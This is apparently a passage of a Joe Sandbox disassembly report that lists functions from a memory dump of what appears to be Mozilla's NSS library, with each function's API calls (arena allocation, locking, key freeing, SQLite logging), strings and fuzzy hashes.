Part of subcall function 6C740FF0: PR_NewLock.NSS3(?,00000800,6C6DEF74,00000000), ref: 6C741016
Part of subcall function 6C740FF0: PL_InitArenaPool.NSS3(00000000,security,6C6E87ED,00000008,?,00000800,6C6DEF74,00000000), ref: 6C74102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6C76DC29,?), ref: 6C6EBE78

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6C76DC29,?), ref: 6C6EBE96

Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74116E

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6C76DC29,?), ref: 6C6EBEBB

Part of subcall function 6C73FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C738D2D,?,00000000,?), ref: 6C73FB85
Part of subcall function 6C73FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C73FBB1

PR_SetError.NSS3(FFFFE013,00000000,?,6C76DC29,?), ref: 6C6EBEDF
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6C76DC29,?), ref: 6C6EBEF3

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 3111646008-0
Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction ID: b6c31ed73709fb0a85d095a94990f66265c1b5848815bd5e5bfafcc38c589159
Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction Fuzzy Hash: F011EB71E013055BEB009B65AD49FAE3768DF85399F144025EE08E7780F731D919C7A9

Function 6C773C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C775B40: PR_GetIdentitiesLayer.NSS3 ref: 6C775B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C773D3F

Part of subcall function 6C6EBA90: PORT_NewArena_Util.NSS3(00000800,6C773CAF,?), ref: 6C6EBABF
Part of subcall function 6C6EBA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C773CAF,?), ref: 6C6EBAD5
Part of subcall function 6C6EBA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C773CAF,?), ref: 6C6EBB08
Part of subcall function 6C6EBA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C773CAF,?), ref: 6C6EBB1A
Part of subcall function 6C6EBA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C773CAF,?), ref: 6C6EBB3B

PR_EnterMonitor.NSS3(?), ref: 6C773CCB

Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90AB
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90C9
Part of subcall function 6C7A9090: EnterCriticalSection.KERNEL32 ref: 6C7A90E5
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A9116
Part of subcall function 6C7A9090: LeaveCriticalSection.KERNEL32 ref: 6C7A913F

PR_EnterMonitor.NSS3(?), ref: 6C773CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C773CF8
PR_ExitMonitor.NSS3(?), ref: 6C773D15
PR_ExitMonitor.NSS3(?), ref: 6C773D2E

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: c7cdc4236e3d2c2b56d62148bb6790d6562d7d5f77c252b6f012bbd5c7932b3c
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: 24115B756106046FEB305A65FE46B9BB7E4EF11208F004234E81AC7B21E333F829C262

Function 6C73FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C73FE08

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C73FE1D

Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C73FE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C73FE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C73FE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6C73FE6F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: 004e08647186482c551f1a025fe32a77cc1c0a6ee3e94b96af7b12f350ca6796
Instruction ID: 0362d1fda57a72c801b1071e6a347e8a3452a52d879f14a8df7719f00cad4eeb
Opcode Fuzzy Hash: 004e08647186482c551f1a025fe32a77cc1c0a6ee3e94b96af7b12f350ca6796
Instruction Fuzzy Hash: 9F1108B6640215ABEB009F64DE48A5B739CAF542D9F148078E91C87B93E731D914C791

Function 6C7EFD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6C7EFD9E

Part of subcall function 6C7A9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C6D1A48), ref: 6C7A9BB3
Part of subcall function 6C7A9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6D1A48), ref: 6C7A9BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6C7EFDB9

Part of subcall function 6C6CA900: TlsGetValue.KERNEL32(00000000,?,6C8414E4,?,6C664DD9), ref: 6C6CA90F
Part of subcall function 6C6CA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C6CA94F

PR_Unlock.NSS3 ref: 6C7EFDD4
PR_Lock.NSS3 ref: 6C7EFDF2
PR_NotifyAllCondVar.NSS3 ref: 6C7EFE0D
PR_Unlock.NSS3 ref: 6C7EFE23

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: e0ade673007cb42c65ff9715d754eb028429269b7a92d57951d34665e92caf29
Instruction ID: 53d419f66522c7a0ada9b3388131d20e3fdf2fae20eaa5d00572b5846dee3586
Opcode Fuzzy Hash: e0ade673007cb42c65ff9715d754eb028429269b7a92d57951d34665e92caf29
Instruction Fuzzy Hash: 2601A1B6A00601AFCF159F15FD058567A32FB1226C71483B5E82647FE2E722ED39C6C2

Function 6C6CAE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6CAFDA

Strings

%s at line %d of [%.10s], xrefs: 6C6CAFD3
misuse, xrefs: 6C6CAFCE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6CAFC4
unable to delete/modify collation sequence due to active statements, xrefs: 6C6CAF5C

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: cd22481f11264593d6726e15636a8528693ca8ca5e830c6295e6351b6c29dbe8
Instruction ID: 49619045f5a7c92a5ba7ed3d9f64d2591100063689cc140224993a34674a8dc8
Opcode Fuzzy Hash: cd22481f11264593d6726e15636a8528693ca8ca5e830c6295e6351b6c29dbe8
Instruction Fuzzy Hash: 9A91E375B042158FDB04CF29C894AEAB7F1FF89314F198568E865AB752C334EC01CBA9

Function 6C72FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C72FC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C72FCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C72FDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C72FDDE

Part of subcall function 6C738800: TlsGetValue.KERNEL32(?,6C74085A,00000000,?,6C6E8369,?), ref: 6C738821
Part of subcall function 6C738800: TlsGetValue.KERNEL32(?,?,6C74085A,00000000,?,6C6E8369,?), ref: 6C73883D
Part of subcall function 6C738800: EnterCriticalSection.KERNEL32(?,?,?,6C74085A,00000000,?,6C6E8369,?), ref: 6C738856
Part of subcall function 6C738800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C738887
Part of subcall function 6C738800: PR_Unlock.NSS3(?,?,?,?,6C74085A,00000000,?,6C6E8369,?), ref: 6C738899

Strings

pkcs11:, xrefs: 6C72FC4F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: 7c5869445d85bb3739de3f26a44b81553abcbe76f89c9eb409cc66b12b35e533
Instruction ID: a4caaff5bd468fabe994adb3a07c2beb64ef5463d08a19998c13134247c330d1
Opcode Fuzzy Hash: 7c5869445d85bb3739de3f26a44b81553abcbe76f89c9eb409cc66b12b35e533
Instruction Fuzzy Hash: 9E51E5B2A041319BDB109F65DF59F9A3365EF4135CF140136DD089BB52EB38E904CB92

Function 6C66BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6C66BE02

Part of subcall function 6C799C40: memcmp.VCRUNTIME140(?,00000000,6C66C52B), ref: 6C799D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C66BE9F

Strings

database corruption, xrefs: 6C66BE93
%s at line %d of [%.10s], xrefs: 6C66BE98
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C66BE89

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: c4001ed95752feddbcb678cb223b8961a32abdf67765ec4a31ea1759cb300839
Instruction ID: 382c30b5b73b9f6b9e3974e027d9d88ae0dcc2a76749b1fedadd2605c7f39f06
Opcode Fuzzy Hash: c4001ed95752feddbcb678cb223b8961a32abdf67765ec4a31ea1759cb300839
Instruction Fuzzy Hash: 3F315931A04256DBC310CF6BC8D4AABBBA1AF81354B088554FE581BF41D370EC06D3D6

Function 6C6E1EC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C6E4C64,?,-00000004), ref: 6C6E1EE2

Part of subcall function 6C741820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C6E1D97,?,?), ref: 6C741836

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C6E4C64,?,-00000004), ref: 6C6E1F13
DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C6E4C64,?,-00000004), ref: 6C6E1F37
DER_DecodeTimeChoice_Util.NSS3(?,dLnl,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6E4C64,?,-00000004), ref: 6C6E1F53

Strings

dLnl, xrefs: 6C6E1F2B, 6C6E1F51

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$GeneralizedTime_
String ID: dLnl
API String ID: 3216063065-1408934070
Opcode ID: 2ad6da30243f06925e9c7a8a6930a4a89b15eae9ec8daf5e89b5545707466ca6
Instruction ID: 817f5562c56dc8032d5aa1dbe46d1ec26dbb1fd72ce42a8cb78e78bb069e6bfb
Opcode Fuzzy Hash: 2ad6da30243f06925e9c7a8a6930a4a89b15eae9ec8daf5e89b5545707466ca6
Instruction Fuzzy Hash: 44219271509306AFC700DF2ADD04ADBB7E9AB88799F00492AE858C3A41F330E519CBD2

Function 6C6D0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C6D0BDE), ref: 6C6D0DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C6D0BDE), ref: 6C6D0DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C6D0BDE), ref: 6C6D0DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C6D0BDE), ref: 6C6D0E32

Strings

%s incr => %d (find lib), xrefs: 6C6D0E2D

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 72fd5ed4e2e922f3ed9bcce4fefea874fcede8204475abb4af9abe680abb1874
Instruction ID: b683747490ec1740f3e87a0f998c49a0affd9b1bbacfedb76e56bfa975e1b03e
Opcode Fuzzy Hash: 72fd5ed4e2e922f3ed9bcce4fefea874fcede8204475abb4af9abe680abb1874
Instruction Fuzzy Hash: 1A01B1726002249FE6209F65DC89E17B3E8DB45B09B06487DE949D3B41E661FC15C6E1

Function 6C78AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]wl,00000000,?,?,6C766AC6,?), ref: 6C78AC2D

Part of subcall function 6C72ADC0: TlsGetValue.KERNEL32(?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AE10
Part of subcall function 6C72ADC0: EnterCriticalSection.KERNEL32(?,?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AE24
Part of subcall function 6C72ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C70D079,00000000,00000001), ref: 6C72AE5A
Part of subcall function 6C72ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AE6F
Part of subcall function 6C72ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AE7F
Part of subcall function 6C72ADC0: TlsGetValue.KERNEL32(?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AEB1
Part of subcall function 6C72ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AEC9

PK11_FreeSymKey.NSS3(?,@]wl,00000000,?,?,6C766AC6,?), ref: 6C78AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]wl,00000000,?,?,6C766AC6,?), ref: 6C78AC59
free.MOZGLUE(8CB6FF01,6C766AC6,?,?,?,?,?,?,?,?,?,?,6C775D40,00000000,?,6C77AAD4), ref: 6C78AC62

Strings

@]wl, xrefs: 6C78AC05

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]wl
API String ID: 1595327144-4199479424
Opcode ID: 6082861250407418eda706d020c1b9acbfbd2568d26d3043f83cf73e2a20a83f
Instruction ID: 5a446b6b845c81af86bc0a4f70f22e8ec4d4700b0af1e54845a9eb15a08265e3
Opcode Fuzzy Hash: 6082861250407418eda706d020c1b9acbfbd2568d26d3043f83cf73e2a20a83f
Instruction Fuzzy Hash: C301ADB56012009FDF10CF14EAC4B4677A8EF04B6CF1880B8EA098F746D734E808CBA1

Function 6C679C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C679CF2
LeaveCriticalSection.KERNEL32(?), ref: 6C679D45
EnterCriticalSection.KERNEL32(?), ref: 6C679D8B
LeaveCriticalSection.KERNEL32(?), ref: 6C679DDE

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 77aad111505a87ec39167f3b6f6c3c9b13c64bffa3d742112808b43d68dea435
Instruction ID: 3bb7ca464c5977cbe54e040407d035aec3bce8016fd0c61dc1337562a2ef2f1a
Opcode Fuzzy Hash: 77aad111505a87ec39167f3b6f6c3c9b13c64bffa3d742112808b43d68dea435
Instruction Fuzzy Hash: B4A1BC317001008BEB38AF64EA9976A37B1BB8331DF18593DD40A47A41DB3DD856CBE6

Function 6C701E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6C701ECC

Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90AB
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90C9
Part of subcall function 6C7A9090: EnterCriticalSection.KERNEL32 ref: 6C7A90E5
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A9116
Part of subcall function 6C7A9090: LeaveCriticalSection.KERNEL32 ref: 6C7A913F

TlsGetValue.KERNEL32 ref: 6C701EDF
EnterCriticalSection.KERNEL32(?), ref: 6C701EEF
PR_ExitMonitor.NSS3(?), ref: 6C701F37
PR_Unlock.NSS3(?), ref: 6C701F44

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
String ID:
API String ID: 3539092540-0
Opcode ID: 622731602dd0914d5524e1c10f261fafd50abdef5da9d7bdbe09ce164cbb4d41
Instruction ID: 0478ed8cc62704eb97250c546260147668ac73b8eccdb1051f858d69626098a7
